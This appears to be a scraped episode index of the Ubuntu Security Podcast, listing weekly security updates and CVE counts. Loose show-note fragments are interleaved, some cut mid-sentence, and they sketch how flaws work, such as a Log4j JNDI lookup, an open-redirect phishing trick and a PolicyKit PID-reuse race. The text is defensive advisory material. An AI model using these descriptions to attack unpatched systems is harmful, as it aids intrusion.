that URI and then execute itjava/org/apache/logging/log4j/core/lookup/JndiLookup
)2.16.0
was done - this is now
in Ubuntu >= 20.04 LTS as well (USN-5197-1)A preview of some things to come for the Ubuntu Security Podcast plus we cover security updates for Samba, uriparser, libmodbus, MariaDB, Mailman and more.
38 unique CVEs addressed
A gnarly old bug in NSS is unearthed, plus we cover security updates for ICU, the Linux kernel and ImageMagick as well.
20 unique CVEs addressed
This week we put out a call for testing and feedback on proposed Samba updates for Ubuntu 18.04 LTS plus we look at security updates for Mailman, Thunderbird, LibreOffice, BlueZ and more.
15 unique CVEs addressed
This week we discuss some of the challenges and trade-offs encountered when providing security support for ageing software, plus we discuss security updates for the Linux kernel, Firejail, Samba, PostgreSQL and more.
42 unique CVEs addressed
~/.pam_environment
to keep
settings in syncThis week we look at some details of the 29 unique CVEs addressed across the supported Ubuntu releases in the past 7 days and more.
29 unique CVEs addressed
docker login
but also had configured
credsStore
and credsHelper
in ~/.docker/config.json
and these were not
able to be executed (ie. execute bit not set or not in $PATH
), then creds
would get sent to the public docker registry rather than the configured
private registry.The road to Ubuntu 22.04 LTS begins so we look at some of its planned features plus we cover security updates for the Linux kernel, Mailman, Apport, PHP, Bind and more.
92 unique CVEs addressed
/var/lib/apport/coredump
nftables
backend in ufw
so it can drive
nftables
directly rather than iptables
pivot_root
in AppArmor
pivot_root
occurs, AppArmor loses track of the original paths so
if a root level process is granted pivot_root
permission, can move
around inside it’s own mount namespace to be able to escape outside the
AppArmor policyUbuntu 20.04 LTS targeted at Tianfu Cup 2021 plus we cover security updates for Linux kernel, nginx, Ardour and strongSwan.
24 unique CVEs addressed
Standard_D48_v3
instance (48 vCPUs, 192GB RAM, 1.2TB storage) - dropped
that patch to resolve the issueIt’s release week! As Ubuntu 21.10 Impish Indri is released we take a look at some of the new security features it brings, plus we cover security updates for containerd, MongoDB, Mercurial, docker.io and more.
58 unique CVEs addressed
FileNameUtils.normalize()
-
should remove relative path components like ../
but if contained leading
double-slashes this would fail - and the original path would be returned
without alteration - so could then possibly get relative directory
traversal to the parent directory depending on how this returned value
was used.io_uring
(5.1) - unprivileged user - trigger free of other kernel
memory - code executiondocker cp
- could craft a container image that would result in docker cp
making changes to existing files on the host filesystem - doesn’t
actually allow to read/modify or execute files on the host but could make
them readable/change perms etc and expose info on the hostThis week we look at a Wifi lookalike attack dubbed “SSID stripping” plus updates for ca-certificates, EDK II, Apache, the Linux kernel and even vim!
28 unique CVEs addressed
mod_proxy
- so could lead to request splitting / cache
poisingmod_proxy_uwsgi
- crash / info leakap_escape_quotes()
if given malicious input - modules in
apache itself don’t pass untrusted input to this but other 3rd party
modules mightmod_proxy
- forward the request to an origin server as
specified in the request - SSRF
SetHandler
config option for mod_proxy
that broke various configurations using
unix sockets - these got interpreted more like URIs and so would be
seen as invalid - broke Plesk and others - upstream then issued further
fixes which we released in a follow-upio_uring
(5.1) - unprivileged user - trigger free of other kernel
memory - code executionwpa_supplicant
,
NetworkManager
, gnome-shell
etc)Extended Security Maintenance gets an extension, Linux disk encryption and authentication goes under the microscope and we cover security updates for libgcrypt, the Linux kernel, Python, and more.
20 unique CVEs addressed
ioctl()
/usr
, encrypted, authenticated /etc
, /var
and per-user
/home/user
encryption using their own login passwordRELEASE | RELEASE DATE | END OF LIFE* |
---|---|---|
Ubuntu 14.04 (Trusty Tahr) | April 2014 | April 2024(from April 2022) |
Ubuntu 16.04 (Xenial Xerus) | April 2016 | April 2026(from April 2024) |
Ubuntu 18.04 (Bionic Beaver) | April 2018 | April 2028(unchanged) |
Ubuntu 20.04 (Focal Fossa) | April 2020 | April 2030(unchanged) |
OWASP Top 10 gets updated for 2021 and we look at security vulnerabilities in the Linux kernel, Ghostscript, Git, curl and more.
26 unique CVEs addressed
This week we discuss compiler warnings as build errors in the Linux kernel, plus we look at security updates for HAProxy, GNU cpio, PySAML2, mod-auth-mellon and more.
15 unique CVEs addressed
///
- an attacker could craft a URL
that specified a particular URL via the ReturnTo
parameter and this would
then automatically redirect the user to that crafted URL - so could be
used for phishing attacks that look more trustworthy. ie. an attacker
creates a phishing site that copies the victim site at their own
domain. they then send an email to a user asking them to login and they
specify a URL to the real victim site but with the ReturnTo
parameter set
to their own site - a user looking at this URL will see it specifies the
real site so won’t be concerned - when they visit it they get
automatically redirected to the victim site - so if they don’t then check
the URL they will start logging into the fake phishing site and not the
real one - fixed to just reject these URLs so they don’t get abused by
the redirect processCOMPILE_TEST
is enabled - this used as a flag
to tell the kernel to compile everything even if it is not being used -
and is then often used by CI systems / developers which explicitly want
to compile everything who work on detecting new warningsThis week we look at a malware campaign associated with the popular Krita painting application, plus we cover security updates for MongoDB, libssh, Squashfs-Tools, Thunderbird and more.
17 unique CVEs addressed
This week we dive into Trend Micro’s recent Linux Threat Report and the release of Ubuntu 20.04.3 LTS, plus we detail security updates for Inetutils telnetd, the Linux kernel and OpenSSL.
9 unique CVEs addressed
EVP_PKEY_decrypt()
twice - call
first time to get the required buffer size to hold the decrypted
plaintext - second time to do the actual decryption passing a buffer of
the specified length to hold the resultThis week we look at security updates for Firefox, PostgreSQL, MariaDB, HAProxy, the Linux kernel and more, plus we cover some current openings on the team - come join us ☺
35 unique CVEs addressed
This week Ubuntu 20.04 LTS was FIPS 140-2 certified plus the AppArmor project made some point releases, and we released security updates for Docker, Perl, c-ares, GPSd and more.
2 unique CVEs addressed
This week we discuss new kernel memory hardening and security development proposals from Ubuntu Security Alumnus Kees Cook, plus we look at details of security updates for WebKitGTK, libsndfile, GnuTLS, exiv2 and more.
22 unique CVEs addressed
It’s another week when too many security updates are never enough as we cover 240 CVE fixes across Avahi, QEMU, the Linux kernel, containerd, binutils and more, plus the Ubuntu 20.10 Groovy Gorilla end-of-life.
240 unique CVEs addressed
Is npm audit more harm than good? Plus this week we look at security updates for DjVuLibre, libuv, PHP and more.
8 unique CVEs addressed
This week we look at some new Linux kernel security features including the Landlock LSM and Core Scheduling plus we cover security updates for RabbitMQ, Ceph, Thunderbird and more.
46 unique CVEs addressed
Ubuntu One opens up two-factor authentication for all, plus we cover security updates for Nettle, libxml2, GRUB2, the Linux kernel and more.
73 unique CVEs addressed
In this week’s episode we look at how to get media coverage for your shiny new vulnerability, plus we cover security updates for ExifTool, ImageMagick, BlueZ and more.
49 unique CVEs addressed
This week we cover security updates for the Linux kernel, PolicyKit, Intel Microcode and more, plus we look at a report of an apparent malicious snap in the Snap Store and some of the mechanics behind snap confinement.
42 unique CVEs addressed
This week we look at DMCA notices sent against Ubuntu ISOs plus security updates for nginx, DHCP, Lasso, Django, Dnsmasq and more.
24 unique CVEs addressed
This week we’re talking about moving IRC networks plus security updates for Pillow, Babel, Apport, X11 and more.
24 unique CVEs addressed
With 60 CVEs fixed across MySQL, Django, Please and the Linux kernel this week we take a look at some of these details, plus look at the recent announcement of 1Password for Linux and some open positions on the team too.
60 unique CVEs addressed
This week we look at some details of the 90 unique CVEs addressed across the supported Ubuntu releases and more.
90 unique CVEs addressed
This week we look at the response from the Linux Technical Advisory Board to the UMN Linux kernel incident, plus we cover the 21Nails Exim vulnerabilities as well as updates for Bind, Samba, OpenVPN and more.
40 unique CVEs addressed
With 21 CVEs fixed this week we look at updates for Dnsmasq, Firefox, OpenJDK and more, plus we discuss the recent release of Ubuntu 21.04 and malicious commits in the upstream Linux kernel.
21 unique CVEs addressed
This week we look at a reboot of the DWF project, Rust in the Linux kernel, an Ubuntu security webinar plus some details of the 45 CVEs addressed across the Ubuntu releases this last week and more.
45 unique CVEs addressed
This week we look at how Ubuntu is faring at Pwn2Own 2021 (which still has 1 day and 2 more attempts at pwning Ubuntu 20.10 to go) plus we look at security updates for SpamAssassin, the Linux kernel, Rack and Django, and we cover some open positions on the Ubuntu Security team too.
14 unique CVEs addressed
This week we look at 2 years of 14.04 ESM, a kernel Livepatch issue, DNS-over-HTTPS for Google Chrome plus security updates for ldb, OpenSSL, Squid, curl and more.
38 unique CVEs addressed
This week we look at security updates for containerd, Ruby, the Linux kernel, Pygments and more, plus we cover some open positions within the team as well.
28 unique CVEs addressed
This week we start preparing for 16.04 LTS to transition to Extended Security Maintenance, plus we look at security updates for OpenSSH, Python, the Linux kernel and more, as well as some currently open positions on our team.
28 unique CVEs addressed
This week we check on the status of the pending GRUB2 Secure Boot updates and detail some open positions within the team, plus we look at security updates for GLib, zstd, Go, Git and more.
7 unique CVEs addressed
This week we talk about more BootHole-like vulnerabilities in GRUB2, a Spectre exploit found in-the-wild, security updates for xterm, screen, Python, wpa_supplicant and more.
52 unique CVEs addressed
This week we discuss security updates in Linux Mint, Google funding Linux kernel security development and details for security updates in BIND, OpenSSL, Jackson, OpenLDAP and more.
14 unique CVEs addressed
This week we take a look at a long-awaited update of Thunderbird in Ubuntu 20.04LTS, plus security updates for Open vSwitch, JUnit 4, PostSRSd, GNOME Autoar and more.
14 unique CVEs addressed
This week we take a deep dive look at 2 recent vulnerabilities in the popular application containerisation frameworks, snapd and flatpak, plus we cover security updates for MiniDLNA, PHP-PEAR, the Linux kernel and more.
26 unique CVEs addressed
This week we discuss the recent high profile vulnerability found in libcrypt 1.9.0, plus we look at updates for the Linux kernel, XStream, Django, Apport and more.
66 unique CVEs addressed
In the first episode for 2021 we bring back Joe McManus to discuss the SolarWinds hack plus we look at vulnerabilities in sudo, NVIDIA graphics drivers and mutt. We also cover some open positions in the team and say farewell to long-time Ubuntu Security superstar Jamie Strandboge.
22 unique CVEs addressed
For the last episode of 2020, we look back at the most “popular” packages on this podcast for this year as well as the biggest vulnerabilities from 2020, plus a BootHole presentation at Ubuntu Masters as well as vulnerability fixes from the past week too.
21 unique CVEs addressed
This week we look at security updates for Mutt, Thunderbird, Poppler, QEMU, containerd, Linux kernel & more, plus we discuss the 2020 State of the Octoverse Security Report from Github, Launchpad GPG keyserver migration, a new AppArmor release & some open positions on the team.
68 unique CVEs addressed
This week we look at updates for c-ares, PulseAudio, phpMyAdmin and more, plus we cover security news from the Ubuntu community including planning for 16.04 LTS to transition to ESM, libgcrypt FIPS cerified for 18.04 LTS and a proposal for making home directories more secure for upcoming Ubuntu releases as well.
48 unique CVEs addressed
This week we look at vulnerabilities in MoinMoin, OpenLDAP, Kerberos, Raptor (including a discussion of CVE workflows and the oss-security mailing list) and more, whilst in community news we talk about the upcoming AppArmor webinar, migration of Ubuntu CVE information to ubuntu.com and reverse engineering of malware by the Canonical Sustaining Engineering team.
45 unique CVEs addressed
This week we look at results from the Tianfu Cup 2020, the PLATYPUS attack against Intel CPUs, a detailed writeup of the GDM/accountsservice vulnerabilities covered in Episode 95 and more.
23 unique CVEs addressed
This week we look at vulnerabilities in Samba, GDM, AccountsService, GOsa and more, plus we cover some AppArmor related Ubuntu Security community updates as well.
26 unique CVEs addressed
This week we cover news of the CITL drop of 7000 “vulnerabilities”, the Ubuntu Security disclosure and embargo policy plus we look at security updates for pip, blueman, the Linux kernel and more.
117 unique CVEs addressed
This week we cover security updates for NTP, Brotli, Spice, the Linux kernel (including BleedingTooth) and a FreeType vulnerability which is being exploited in-the-wild, plus we talk about the NSAs report into the most exploited vulnerabilities as well as the release of Ubuntu 20.10 Groovy Gorilla.
74 unique CVEs addressed
1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
DCCP protocol mishandled reuse of sockets, leading to a UAF - since can be done by a local user could lead to root code execution, priv esc etc - was reported to Canonical and we worked with upstream kernel devs on resolving this etc
It’s CVE bankruptcy! With a deluge of CVEs to cover from the last 2 weeks, we take a particular look at the ZeroLogon vulnerability in Samba this week, plus Alex covers the AppArmor 3 release and some recent / upcoming webinars hosted by the Ubuntu Security team.
121 unique CVEs addressed
This week we look at security updates for GUPnP, OpenJPEG, bsdiff and more.
24 unique CVEs addressed
This week we look at security updates for the X server, the Linux kernel and GnuTLS plus we preview the upcoming AppArmor3 release that is slated for Ubuntu 20.10 (Groovy Gorilla).
20 unique CVEs addressed
This week we farewell Joe McManus plus we look at security updates for Firefox, Chrony, Squid, Django, the Linux kernel and more.
59 unique CVEs addressed
This week we talk antivirus scanners and false positives in the Ubuntu archive, plus we look at security updates for QEMU, Bind, Net-SNMP, sane-backends and more.
56 unique CVEs addressed
sudo apt install jq
xdg-open "https://www.virustotal.com/gui/file/$(sha256sum /usr/bin/jq | cut -f1 -d' ')"
This week we look at the Drovorub Linux malware outed by the NSA/FBI plus we detail security updates for Dovecot, Apache, Salt, the Linux kernel and more.
24 unique CVEs addressed
This week we discuss the recent announcement of a long-awaited native client for 1password, plus Google Chrome experiments with anti-phishing techniques, and we take a look at security updates for OpenJDK 8, Samba, NSS and more.
13 unique CVEs addressed
Dr. Levi Perigo is our special guest this week to discuss SDN and NFV with Joe, plus Alex does the weekly roundup of security updates, including Ghostscript, Squid, Apport, Whoopsie, libvirt and more.
37 unique CVEs addressed
In a week when too many security updates are never enough, we cover the biggest one of them all for a while, BootHole, with an interview between Joe McManus and Alex Murray for some behind-the-scenes and in-depth coverage, plus we also look briefly at the other 100-odd CVEs for the week in FFmpeg, OpenJDK, LibVNCServer, ClamAV and more.
109 unique CVEs addressed
This week Joe talks Linux Security Modules stacking with John Johansen and Steve Beattie plus Alex looks at security updates for snapd, the Linux kernel and more.
24 unique CVEs addressed
With Ubuntu 19.10 going EOL, we have a special interview by Joe with Chris Coulson and Steve Beattie from the Ubuntu Security Team to talk TPMs and Ubuntu Core 20, plus Alex looks at some of the 71 CVEs addressed by the team and more.
71 unique CVEs addressed
Joe talks cyber security policy with Dr David Reed from CU Boulder, plus Alex covers the week in security updates including Mutt, NVIDIA graphics drivers, Mailman and more.
6 unique CVEs addressed
This week, Sid Faber and Kyle Fazzari of the Ubuntu Robotics team interview Vijay Sarvepalli from CERT about the recent Ripple20 vulnerabilities announcement, plus we look at security updates for Bind, Mutt, curl and more.
8 unique CVEs addressed
This week Joe discusses Intel’s CET announcement with John Johansen, plus Alex details recent security fixes including SQLite, fwupd, NSS, DBus and more.
24 unique CVEs addressed
Return Oriented Programming (ROP) https://en.wikipedia.org/wiki/Return-oriented_programming
Sigreturn Oriented Programming (SROP) (https://en.wikipedia.org/wiki/Sigreturn-oriented_programming
Jump/Call Oriented Programming (JOP) https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/ASIACCS11.pdf
Control-flow Enforcement technology (CET)
CFI in software
Kernel
gcc
glibc
LLVM/Clang
CET on windows
Pre CET software based CFI on windows
Papers/talks on attacking CET/CFI
Smashing the stack for fun and profit
StackClash
SRBDS aka CrossTalk, the latest Intel speculative execution attack, is the big news this week in security updates for Ubuntu, as well as fixes for GnuTLS, Firefox and more, plus Alex and Joe talk about using STRIDE for threat modelling of software products.
39 unique CVEs addressed
This week we look at security updates for Unbound, OpenSSL, Flask, FreeRDP, Django and more, plus Joe and Alex discuss the Octopus malware infecting Netbeans projects.
40 unique CVEs addressed
This week we welcome back Vineetha Kamath, Ubuntu Security Certifications Manager, to discuss the recent release of FIPS modules for Ubuntu 18.04 LTS and we look at security updates for Bind, ClamAV, QEMU, the Linux kernel and more.
24 unique CVEs addressed
In episode 75 we look at security updates for APT, json-c, Bind, the Linux kernel and more, plus Joe and Alex discuss recent phishing attacks and the Wired biopic of Marcus Hutchins.
26 unique CVEs addressed
Special guest, Tim McNamara, author of Rust In Action talks all things Rust plus we look at security updates for Linux bluetooth firmware, OpenLDAP, PulseAudio, Squid and more.
17 unique CVEs addressed
1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
email address looking invalid it would be echo’d back to the user - and so anything supplied as the email address would be displayed
After the recent release of Ubuntu 20.04 LTS, we look at security fixes for OpenJDK, CUPS, the Linux kernel, Samba and more, plus Joe and Alex discuss robot kits and the Kaiji botnet.
86 unique CVEs addressed
A huge number of CVEs fixed in the various Ubuntu releases, including for PHP, Git, Thunderbird, GNU binutils and more, plus Joe McManus discusses ROS with Sid Faber.
93 unique CVEs addressed
This week Joe discusses Ubuntu’s involvement in ZDI’s Pwn2Own with special guests Steve Beattie and Marc Deslauriers from the Ubuntu Security team, plus we do the usual roundup of fixed vulnerabilities including libssh, Thunderbird, Git and a kernel Livepatch.
38 unique CVEs addressed
This week we have a great interview between Joe McManus and Emilia Torino from the Ubuntu Security team, plus we cover security updates for Apport, Firefox, GnuTLS, the Linux kernel and more.
18 unique CVEs addressed
This week we cover security updates for a Linux kernel vulnerability disclosed during pwn2own, Timeshift, pam-krb5 and more, plus we have a special guest, Vineetha Kamath, to discuss security certifications for Ubuntu.
10 unique CVEs addressed
This week we cover security updates for Apache, Twisted, Vim a kernel livepatch and more, plus Alex and Joe discuss OVAL data feeds and the cvescan snap for vulnerability awareness.
16 unique CVEs addressed
A big week in security updates, including the Linux kernel, Ceph, ICU, Firefox, Dino and more, plus Joe and Alex discuss tips for securely working from home in light of Coronavirus.
38 unique CVEs addressed
This week we cover security updates for Django, runC and SQLite, plus Alex and Joe discuss the AMD speculative execution Take A Way attack and we look at some recent blog posts by the team too.
16 unique CVEs addressed
Whilst avoiding Coronavirus, this week we look at updates for libarchive, OpenSMTPD, rake and more, plus Joe and Alex discuss ROS, the Robot Operating System and how the Ubuntu Security Team is involved in the ongoing development of secure foundations for robotics.
7 unique CVEs addressed
This week we look at security updates for ppp, Squid, rsync + more, and Joe and Alex discuss the wide scope of the Ubuntu Security Team including some current open positions.
19 unique CVEs addressed
Security updates for Firefox, QEMU, Linux kernel, ClamAV and more, plus we discuss our recommended reading list for getting into infosec and farewell long-time member of the Ubuntu Security Team / community Tyler Hicks.
54 unique CVEs addressed
This week Alex and Joe take an indepth look at the recent Sudo vulnerability CVE-2019-18634 plus we look at security updates for OpenSMTPD, systemd, Mesa, Yubico PIV tool and more. We also look at a recent job opening for a Robotics Security Engineer to join the Ubuntu Security team.
33 unique CVEs addressed
Joe is back to discuss a recent breach against Wawa, plus we detail security updates from the past week including Apache Solr, OpenStack Keystone, Sudo, Django and more.
23 unique CVEs addressed
Security updates for python-apt, GnuTLS, tcpdump, the Linux kernel and more, plus we look at plans to integrate Ubuntu Security Notices within the main ubuntu.com website.
91 unique CVEs addressed
After a weeks break we are back to look at updates for ClamAV, GnuTLS, nginx, Samba and more, plus we briefly discuss the current 20.04 Mid-Cycle Roadmap Review sprint for the Ubuntu Security Team
73 unique CVEs addressed
In the first episode for 2020, we look at security updates for Django and the Linux kernel, plus Alex and Joe discuss security and privacy aspects of smart assistant connected devices.
34 unique CVEs addressed
In the final episode of 2019, we look at security updates for RabbitMQ, GraphicsMagick, OpenJDK and more, plus Joe and Alex discuss a typical day-in-the-life of a Ubuntu Security Team member.
34 unique CVEs addressed
In the second to last episode for 2019, we look at security updates for Samba, Squid, Git, HAProxy and more, plus Alex and Joe discuss Evil Corp hacker indictments, unsecured AWS S3 buckets and more.
43 unique CVEs addressed
This week we cover security updates for NSS, SQLite, the Linux kernel and more, plus Joe and Alex discuss a recent FBI advisory warning about possible dangers of Smart TVs.
49 unique CVEs addressed
Security updates for DPDK, Linux kernel, QEMU, ImageMagick, Ghostscript and more, plus Joe and Alex talk about how to get into information security.
89 unique CVEs addressed
This week we look at the details of the latest Intel hardware vulnerabilities, including security updates for the Linux kernel and Intel microcode, plus Bash, cpio, FriBidi and more.
26 unique CVEs addressed
This week we look at security updates for FreeTDS, HAProxy, Nokogiri, plus some regressions in Whoopsie, Apport and Firefox, and Joe and Alex discuss the release of 14.04 ESM for personal use under the Ubuntu Advantage program.
9 unique CVEs addressed
In this Halloween Special, Joe and Alex talk about what scares them in security, plus we look at security updates for Firefox, PHP, Samba, Whoopsie, Apport and more.
26 unique CVEs addressed
5 CVEs addressed in Xenial, Bionic, Disco, Eoan
Kevin Backhouse from Semmle Security Research Team
Sander Bos
Alex and Joe discuss the big news of this week - the release of Ubuntu 19.10 Eoan Ermine - plus we look at updates for the Linux kernel, libxslt, UW IMAP and more.
51 unique CVEs addressed
This week we look at updates for Sudo, Python, OpenStack Octavia and more, plus we discuss a recent CVE for Python which resulted in erroneous scientific research results, and we go over some of your feedback from Episode 48.
27 unique CVEs addressed
This week we look at security updates for the Linux kernel, SDL 2, ClamAV and more, plus Alex and Joe talk security and performance trade-offs, snaps and OWASP Top 10 Cloud Security recommendations, and finally Alex covers some recent concerns about the security of the Snap Store.
31 unique CVEs addressed
We catch up on details of the past few weeks of security updates, including Python, curl, Linux kernel, Exim and more, plus Alex and Joe discuss the recent Ubuntu Engineering Sprint in Paris and building a HoneyBot for Admin Magazine.
93 unique CVEs addressed
A massive 85 CVEs addressed this week, including updates for Exim, the Linux Kernel, Samba, systemd and more, plus we discuss hacking BMCs via remote USB devices and password stashes.
85 unique CVEs addressed
This week we look at security updates for Dovecot, Ghostscript, a livepatch update for the Linux kernel, Ceph and Apache, plus Alex and Joe discuss recent Wordpress plugin vulnerabilities and the Hostinger breach, and more.
22 unique CVEs addressed
7 CVEs addressed in Xenial, Bionic, Disco
HTTP/2 DoS issue (Internal Data Buffering) - Episode 43 for nginx
Open redirect in mod_rewrite if have self-referential redirects
Stack buffer overflow + NULL pointer dereference in mod_remoteip
Possible XSS in mod_proxy where the link shown on error pages could be controlled by an attacker - but only possible where configured with proxying enable but misconfigured so that Proxy Error page is shown.
UAF (read) during HTTP/2 connection shutdown
HTTP/2 push - allows server to send resources to a client before it requests them - could overwrite memory of the server’s request pool - this is preconfigured and not under control of client but could cause a crash etc.
HTTP/2 upgrade - can configure to automatically upgrade HTTP/1.1 requests to HTTP/2 - but if this was not the first request on the connection could lead to crash
This week Joe and Alex discuss a recently disclosed backdoor in Webmin, plus we cover security updates from the past week, including for Nova, KDE, LibreOffice, Docker, CUPS and more.
21 unique CVEs addressed
This week we cover vulnerabilities in Ghostscript, the Linux kernel, nginx and more, and we follow up last weeks interview with another interview with Jamie Strandboge, this time talking about the history of the Ubuntu Security team.
53 unique CVEs addressed
This week we have a special interview with Ubuntu Security Team member Jamie Strandboge, talking about security aspects of the Snap packaging system, as well as the usual roundup of security fixes from the past week.
7 unique CVEs addressed
With Alex and Joe having been away at a Canonical sprint last week, we look back at the past fortnight’s security updates including new Linux kernel releases, MySQL, VLC, Django and more plus we discuss a recent Citrix password spraying attack.
90 unique CVEs addressed
Episode 40 (memory corruption issues)
Big roundup of security updates from the past 2 weeks including Docker, ZeroMQ, Squid, Redis and more, plus we talk with Joe McManus about some recent big fines for companies breaching their GDPR responsibilities and it’s EOL for Ubuntu 18.10 Cosmic Cuttlefish.
62 unique CVEs addressed
A look at security updates for Django, Thunderbird, ZNC, Irssi and more, plus news on the CanonicalLtd GitHub account credentials compromise, SKS PGP keyservers under attack and Ubuntu 18.10 Cosmic Cuttlefish reaches EOL.
7 unique CVEs addressed
i - The name of this is checked in various places to ensure control characters and other means of code execution are blocked, but not on all code-paths using modules
This week we look at the latest security updates for the Linux kernel, Firefox, ImageMagick, OpenStack and more, plus we have a special guest, the maintainer and lead developer of the AppArmor project, John Johansen, to talk about the project and some of the upcoming features.
55 unique CVEs addressed
The big new this week is SackPANIC! updates for the Linux kernel, plus we look at vulnerabilities in, and updates for, Samba, SQLite, Bind, Thunderbird and more, and we are hiring!
36 unique CVEs addressed
Security updates for DBus, vim, elfutils, GLib and more, plus Joe and Alex look at another npm package hijack as well as some wider discussions around the big vim RCE of this week.
43 unique CVEs addressed
We look at vulnerabilities and updates for Exim, the Linux kernel, Berkeley DB, Qt and more, plus Joe and Alex discuss some recent malware campaigns including Hiddenwasp, and we cover some open positions too.
34 unique CVEs addressed
This week we look at security updates for Keepalived, Corosync, GnuTLS, libseccomp and more, plus we talk insider threats with Joe McManus.
32 unique CVEs addressed
Updated Intel microcode for Cherry + Bay Trial CPUs, fixes for vulnerabilities in curl, Firefox, PHP and MariaDB, plus we talk configuration of virtualised guests to mitigate speculative execution vulnerabilities as well as plans for the Ubuntu 19.10 development cycle.
43 unique CVEs addressed
This week we look at updates to cover the latest Intel CPU vulnerabilities (MDS - aka RIDL, Fallout, ZombieLoad), plus other vulnerabilies in PostgreSQL, ISC DHCP, Samba and more, whilst special guest this week is Seth Arnold from the Ubuntu Security Team to talk Main Inclusion Review code audits.
37 unique CVEs addressed
This week we cover security fixes for GNOME Shell, FFmpeg, Sudo, Ghostscript and others, and we talk to Joe McManus about malicious Dockerhub images, Git repos being ransomed more.
14 unique CVEs addressed
Fixes for 19 different vulnerabilities across MySQL, Dovecot, Memcached and others, plus we talk to Joe McManus about the recent iLnkP2P IoT hack and the compromise of DockerHub’s credentials database and more.
19 unique CVEs addressed
This week we look at fixes from the past two weeks including BIND, NTFS-3G, Dovecot, Pacemaker and more, plus we follow up last episodes IoT security discussion with Joe McManus talking about Ubuntu Core. Finally we cover the release of Ubuntu 19.04 Disco Dingo and the transition of Ubuntu 14.04 Trusty Tahr to Extended Security Maintenance.
53 unique CVEs addressed
This week we look at updates for vulnerabilities in wpa_supplicant, Samba, systemd, wget and more and we talk to Joe about IoT security (or the prevailing lack-thereof).
27 unique CVEs addressed
Carpe Diem for Apache HTTP Server, plus updates for Dovecot, PolicyKit and the Linux kernel, and we talk to Joe McManus about the recent Asus ShadowHammer supply chain attack and more.
52 unique CVEs addressed
This week we look security updates for a heap of packages including Firefox & Thunderbird, PHP & QEMU, plus we discuss Facebook’s recent password storage incident as well as some listener hardening tips and more.
48 unique CVEs addressed
Ghostscript is back to haunt us for another week, plus we look at vulnerabilities in ntfs-3g, snapd, firefox and more.
39 unique CVEs addressed
A look at recent fixes for vulnerabilities in poppler, WALinuxAgent, the Linux kernel and more. We also talk about some listener feedback on Ubuntu hardening and the launch of Ubuntu 14.04 ESM.
18 unique CVEs addressed
This week we look at security updates for the Linux kernel, PHP and NVIDIA drivers, revealing recent research into GPU based side-channel attacks plus we call for suggestions on hardening features and more.
10 unique CVEs addressed
PolicyKit provides ability to authorise an application to perform privileged actions
Pops up dialog for use to authorise via password - PolicyKit then caches that authorisation (5mins)
To identify same process in future, would look at both the PID and process start time to guard against PID reuse etc
However, fork() system call is not atomic, so attacked could call sys_clone() at same time as real process so it has the same start time. Can then cause kernel to block on returning back to the attacker process, effectively racing against the real process waiting for it to end, in the meantime blocking PID allocation until it has cycled around and end up with the same (reused) PID as the original authorised process (and with same start time) - so can effectively fool PolicyKit into impersonating the real process
Fix kernel to make fork() atomic rather than try fix PolicyKit since can’t effectively do this at the process level
Kernel fixed to record process start time later in procedure so is much closer to when the process is visible to userspace and after userspace has a chance to delay it to mitigate this
Jann also discovered that userfaultfd does not properly handle access control for certain ioctl() - which allowed local users to write data into holes in a tmpfs file, even if the user only had read-only access to the file
This week we cover security updates including Firefox, Thunderbird, OpenSSL and another Ghostscript regression, plus we look at a recent report from Capsule8 comparing Linux hardening features across various distributions and we answer some listener questions.
16 unique CVEs addressed
Double episode covering the security updates from the last 2 weeks, including snapd (DirtySock), systemd and more, plus we talk responsible disclosure and some open positions on the Ubuntu Security team.
15 unique CVEs addressed
This week we look at Linux kernel updates for all releases, OpenSSH, dovecot, curl and more. Plus we answer some frequently asked questions for Ubuntu security, in particular the perennial favourite of why we choose to just backport security fixes instead of doing rolling package version updates to resolve outstanding CVEs.
33 unique CVEs addressed
This week we look at updates to the Linux kernel in preparation for the 18.04.2 release, plus updates for Open vSwitch, Firefox, Avahi, LibVNCServer and more. We also revisit and discuss upstream changes to the mincore() system call to thwart page-cache side-channel attacks first discussed in Episode 17.
40 unique CVEs addressed
This week we look at some details of the 46 unique CVEs addressed across the supported Ubuntu releases and take a deep dive into the recent apt security bug.
46 unique CVEs addressed
First episode of 2019! This week we look “System Down” in systemd, as well as updates for the Linux kernel, GnuPG, PolicyKit and more, and discuss a recent cache-side channel attack using the mincore() system call.
51 unique CVEs addressed across the supported Ubuntu releases.
Last episode for 2018! This week we look at CVEs in lxml, CUPS, pixman, FreeRDP & more, plus we discuss the security of home routers as evaluated by C-ITL.
21 unique CVEs addressed
Security updates for 29 CVEs including Perl, the kernel, OpenSSL (PortSmash) and more, plus in response to some listener questions, we discuss how to make sure you always have the latest security updates by using unattended-upgrades.
29 unique CVEs addressed
6 CVEs addressed in Cosmic, 2 in Bionic and Xenial
Episode 14 covered CVE-2018-6559 (overlayfs / user namespace directory names disclosure)
Episode 12 covered CVE-2018-17972 (procfs kernel stack disclosure)
3 CVEs discovered by Jann Horn (and one inadvertently caused by Jann too)
Vulnerability specific to the Ubuntu kernel used in Cosmic (18.10)
This week we look at some details of the 32 unique CVEs addressed across the supported Ubuntu releases and talk open source software supply chain integrity and how this relates to Ubuntu compared to the recent npm event-stream compromise.
32 unique CVEs addressed
This week we look at some details of the 16 unique CVEs addressed across the supported Ubuntu releases and more.
16 unique CVEs addressed
This week we look at some details of the 33 unique CVEs addressed across the supported Ubuntu releases, including some significant updates for systemd and the kernel, plus we talk about even more Intel side-channel vulnerabilities and more.
33 unique CVEs addressed
This week we look at some details of the 23 unique CVEs addressed across the supported Ubuntu releases, discuss the latest purported Intel side-channel vulnerability PortSmash and more.
23 unique CVEs addressed
This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases, have a brief look at some Canonical presentations from LSS-EU and more.
17 unique CVEs addressed
This week we look at some details of the 61 unique CVEs addressed across the supported Ubuntu releases, with a particular focus on the recent Xorg vulnerability (CVE-2018-14665), plus Cosmic is now officially supported by the Security Team.
61 unique CVEs addressed
This week we look at some details of the 15 unique CVEs addressed across the supported Ubuntu releases and discuss some of the security relevant changes in Ubuntu 18.10, plus a refresh of the Ubuntu CVE tracker and more.
15 unique CVEs addressed
This week we look at some details of the 78 unique CVEs addressed across the supported Ubuntu releases including more GhostScript, ImageMagick, WebKitGTK, Linux kernel and more.
78 unique CVEs addressed
This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases and more.
17 unique CVEs addressed
